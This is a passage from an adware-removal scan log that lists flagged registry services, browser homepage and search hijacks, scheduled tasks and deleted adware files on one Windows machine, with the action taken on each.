    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cloudynights.com/page/index.html -> Not selected
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cloudynights.com/page/index.html -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Bar : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Bar : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([X][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([][]) -> Not selected
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Not selected
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys -> Not selected
    [PUP|VT.not-a-virus:AdWare.Win64.Agent.lkv] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs : C:\ProgramData\Ronzap\S-la.dll [-] -> Replaced ()
    [PUP|VT.not-a-virus:AdWare.Win32.AdAgent.je] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs : C:\ProgramData\Ronzap\IndigoString.dll [-] -> Replaced ()

    ¤¤¤ Tasks : 7 ¤¤¤
    [PUP] %WINDIR%\Tasks\DriverUpdate Scan.job -- C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe (scheduled) -> Not selected
    [PUP] %WINDIR%\Tasks\DriverUpdate Startup.job -- C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe (-boot) -> Not selected
    [PUP] %WINDIR%\Tasks\PC SpeedUp Service Deactivator.job -- C:\Program Files (x86)\PC Speed Up\PCSUSD.exe (/dev0 /idle) -> Not selected
    [PUP] %WINDIR%\Tasks\System HealerPeriod.job -- C:\Program Files (x86)\SystemHealer\SystemHealer.exe (-scan) -> Not selected
    [PUP] %WINDIR%\Tasks\System HealerStartUp.job -- C:\Program Files (x86)\SystemHealer\SystemHealer.exe (-scan) -> Not selected
    [Suspicious.Path|VT.PUP.Optional.SearchProtect] \bvyvcvd -- C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe -> ERROR [490]
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] \Pritc -- C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe -> ERROR [490]

    ¤¤¤ Files : 42 ¤¤¤
    [PUP][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9AMW -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\K9AMW\backup6.bin -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9Tools -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\K9Tools\k9pcp\ASPStartupManagerErrorLog.txt -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9Tools\k9pcp -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\KuaiZip -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk [LNK@] C:\PROGRA~2\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Uninstall Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\UNINST~1.EXE "/U:C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml" -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\NUIns -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\NUIns\NUIns.exe -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\QuickCleaner -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\QuickCleaner\QuickCleanerCSUS.exe -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\Apps\2.0\abril.InstallLog -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep\UserRepository.dat -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep\UserSettings.dat -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\STG -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\UI\rep\UIRepository.dat -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\UI\rep -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\UI -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SlimWare Utilities Inc -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0048f9ada40778b4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\00a930da0a9a5151_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\00ed39fc304db422_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\020d8e049c7995e7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\050ba2210e843fec_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\05d08bc060d48039_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\05f846c724f590df_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\06484cf527ab201c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\073c3ca73e81003a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0a23c13b783d1e7d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0ae184134c9623be_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0b4700e997a84d46_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0bd2f9de928198c0_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0c3c4773d313c907_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0c53ddf3ba7b0aec_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0dcce0fd2785293c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0e79c214e1aa167d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0f224fd74720a517_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\0f465f0b7cebeea6_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\1279285b15d850f0_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\13c3533611649d4b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\16133c40df9b31cf_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\17af263d84b903a4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\182e9c396fb86b15_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\18b1a9564dd93d79_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\18b67c91c9a9fcb9_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\19fbfc6b06837035_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\1a06f0c36f3a13b5_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\1be3cfe019981dcb_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\1d09533737bb129e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\1f4fd221400a6729_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\2048b7e8251e4df3_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\222251119becd67b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\225483af863f8d59_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\24cda60a3720d981_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\25290c607c92dc5d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\2599460ef0691821_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\25b02eee17ab2b5a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\27248a96e924e86b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\2b07137f9498b509_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\2c59e452bfee2f24_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\2ddffc6dff86ffb1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3040c01fa0391404_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3093baaba1de8813_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\31a487c1f90a4f7d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3314c7c5edab5cea_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3321b36c7e5aea98_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\35b84795a4468775_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\364a32b019a981db_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\37af6bf6490ea5e5_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\39b620a14caf1626_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\39e903de6febf383_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3aa3f45137aa4a04_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3b552feb15a2b9d3_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3be1dbed5b054bf1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3d85436d970732eb_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3dc12d34bca58f23_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3e3bcc599519a678_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3e84817c056df358_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\3efdc08201b8f565_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\41200fc92959bd7d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4295e2a4d413ea5f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\42e8565868b9a0f0_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\438069019e9370a6_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\444ef0617c54b16f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\44773fb64e31672c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\44e305283593e62f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\45a1928276b09417_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\46913af62aa6c872_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\46f755134836d6e1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\478991172192f9c7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\498b72deaeb5c361_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\499fb77fda57a25c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\49cf72450b6d6460_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\49fefa1915d7ff4c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4a96eecfee6ce80a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4cc17ff4a05acabc_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4dc49a83c873a097_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4dd22d4a006e6ee2_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4e2f74417770ab79_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4e30d5ea30de3edd_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4edd3ddfdd30b118_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\4ffe5bc4ae4a2e90_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\519a05830dec303d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\54b9fa5ff02cdec3_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\583aa6d9fad79b7a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\5a10a9b888fd07a1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\5b66b0a932094293_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\5cee5640d986c095_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\5e6d3c3c3dcbc902_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\639df598d559e802_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\644ee58659bc486f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6768b206085f02a4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\67b731cd2c8f751f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\69cb8f8729b47e20_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6b02293d8ca42224_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6cf71b81c347d123_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6d0835e139dea69b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6d6791a9e36ce520_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\6fa6d6f6ea4c9fde_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7077b2ba16645042_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\70c654fdb1e9b7b5_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\719396f0681cdf87_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\73ebed1dc079eb9d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\749f94479f25bbfd_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7795662fe54de48a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\77e8bf4668689c7c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7c9870dfef5194e1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7cdea0fe3b666098_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7d80e5f68342a8da_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\7e562eeee5b84988_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\810d82f088718479_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\81233892bf9271ae_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\82c22979a7842627_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\82e6e09740473fb7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\830aa32150460d86_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\83374f0cba21e302_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\844824f6fcb3005d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8888561462a41f78_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\88a1cadc08b71d82_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\88e6bfa2ea467489_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8910f482ecfb7aef_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8c4232a835e85ef8_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8d5a5f29d669cd26_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8e52febf6dc75e6e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8e846cc1e47d31ef_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\8e8dcd288a0d7920_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\91de35f76b646393_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\922626a5c12afe83_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\943f9fe343e546c2_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\94ba73f58483309e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\956543f4cc60dfce_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9638ffce7ec938cd_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9651c00f6aa2425b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9748715e77219fae_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\99497a1a050357c2_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9b3088553f616c4d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9d31008912ee4f89_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9d37ac779baf8f44_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\9e0e14063148ac81_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a014275edfe7b291_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a055807fdec2f6af_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a2eaf4c41c59cad1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a312a7c0df133922_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a6a9cf2c2f0a671d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\a7f1ebe118e08718_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\abbe0df5e6dc24dd_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ac2b72bef1a0a33e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\adaa16042c4aba19_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ade555fb75a21659_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\aee02106992eb498_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\aef88669a9807194_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b08ca621b22076fb_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b1e230ae09b62407_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b2b597771ebf70b4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b5d61ce476690805_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b60d086e39df4c08_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b624c1f7cbcff908_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b6b411dbd6bdf557_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b6bcfbda34085f2a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b6dec4893f70c6d4_0 -> Deleted
